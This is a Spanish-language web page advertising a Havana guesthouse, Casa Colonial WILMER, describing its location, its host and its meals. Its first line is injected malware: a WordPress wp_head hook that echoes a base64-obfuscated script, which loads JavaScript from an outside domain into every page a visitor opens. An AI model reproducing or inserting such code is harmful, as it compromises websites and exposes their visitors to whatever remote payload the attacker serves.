function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 );
Casa Colonial WILMER se encuentra a solo 4 cuadras de la Iglesia del Sagrado Corazón de Jesús situada en la calle Reina, Tienda de Tabacos, próximo también al Centro Comercial Carlos III que brinda servicios de banca, casa de cambio, Súper – Mercado e Internet. Desde la casa puede caminar hasta el malecón, el Capitolio, Parque Central, Fábrica de Tabacos Partagás y el Casco Histórico de la ciudad a menos de un kilómetro de distancia.
La casa es muy acogedora con gran comodidad, privacidad, seguridad, servicio personalizado, dirigido por Wilmer, el anfitrión, el mismo es un camarero certificado y además Licenciado en Comunicación Social en la Universidad de Habana.
También fué host de la casa “Mirador Alturas al Ocaso” en la playa Guardalavaca, la cual tuvo magníficas referencias de los visitantes durante un período de 5 años en Tripadvisor.
La casa ofrece:
Usted podrá degustar platos típicos cubanos y de la cocina internacional y atesora un servicio de protocolo, barman, avalado por 15 años de experiencia en la industria hotelera.
Desayuno solo por $ 3 cuc con café y otras delicias cubanas